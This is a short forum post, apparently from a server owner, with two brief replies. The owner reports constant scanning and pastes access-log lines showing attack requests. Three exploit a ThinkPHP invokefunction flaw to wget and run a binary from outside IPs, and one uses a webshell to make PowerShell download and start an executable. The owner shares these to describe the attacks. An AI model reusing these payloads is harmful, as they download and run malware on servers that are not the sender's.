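I was attacked  Webshell connection  Remote-control server  Malicious website
Server has recently been scanned constantly by cybercrime groups
Anonymous user 2020-03-14 18:18:00 871 views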

GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://195.88.208.161/bins/UnHAnaAW.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1"

GET /index.php?s=/index/  hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://155.138.215.168/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1"

GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://170.130.172.42/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1"

GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://ero.bckl.ir/download.exe','%SystemRoot%/Temp/ioxlcjfesyyxadv10337.exe');start%20%SystemRoot%/Temp/ioxlcjfesyyxadv10337.exe

The server has been getting scanned constantly lately

acb9550 2020-03-21 17:09:21 Reply
I can't make sense of it
Anonymous user 2020-03-18 15:42:13 Reply
This is all routine stuff